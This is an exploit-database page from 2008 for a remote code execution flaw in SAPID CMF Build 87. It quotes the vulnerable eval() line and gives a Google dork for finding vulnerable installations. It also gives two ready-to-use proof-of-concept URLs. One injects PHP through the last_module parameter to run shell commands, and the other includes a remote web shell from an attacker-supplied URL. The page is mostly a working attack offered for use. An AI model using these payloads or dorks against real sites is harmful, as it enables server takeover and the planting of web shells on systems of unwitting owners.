SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability
# Published : 2008-02-10
# Author : GoLd_M
# Previous Title : ITechBids 6.0 (detail.php item_id) SQL Injection Vulnerability
# Next Title : PacerCMS 0.6 (last_module) Remote Code Execution Vulnerability

### SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability
### Script R84 : http://puzzle.dl.sourceforge.net/sourceforge/sapidcmf/sapidcmf.r84.zip
### Script Update R87 :http://surfnet.dl.sourceforge.net/sourceforge/sapidcmf/sapidcmf.update.r84-r87.zip
### Dork : Powered by SAPID CMF Build 87
### Vuln :
### 09:  */

eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');
### POC :
###     /vendors/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};passthru(ls);//
###     OR INCLUDE SHELL
###     /vendors/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};include(URL-SHELL);//
###  I'm TrYaGi ......:)

# www.Syue.com [2008-02-10]